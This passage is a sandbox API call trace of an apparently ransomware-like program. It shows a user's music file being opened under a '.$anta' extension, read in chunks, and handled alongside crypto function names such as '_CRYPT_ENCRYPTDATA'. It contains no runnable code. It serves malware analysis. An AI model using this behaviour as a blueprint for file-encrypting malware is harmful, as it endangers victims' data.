"c:\\users\\fd1hvy\\music\\9smmb260b1u\\_ldkw-l4k_dtcajqt1.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.280] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0113.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0113.280] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0113.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.283] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0113.283] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0113.286] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x4149, lpOverlapped=0x0) returned 1 [0113.287] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0113.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0113.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0113.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0113.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.292] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0113.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0113.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0113.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.292] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0113.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0113.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0113.293] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0113.293] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0113.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0113.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14149) returned 0x4516010 [0113.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0113.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14149) returned 0x499a008 [0113.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0113.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0113.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0113.297] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0113.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0113.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0113.297] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0113.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0113.298] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0113.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0113.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0113.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0113.298] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0113.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0113.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.299] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0113.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.300] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0113.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0113.300] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0113.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0113.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0113.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 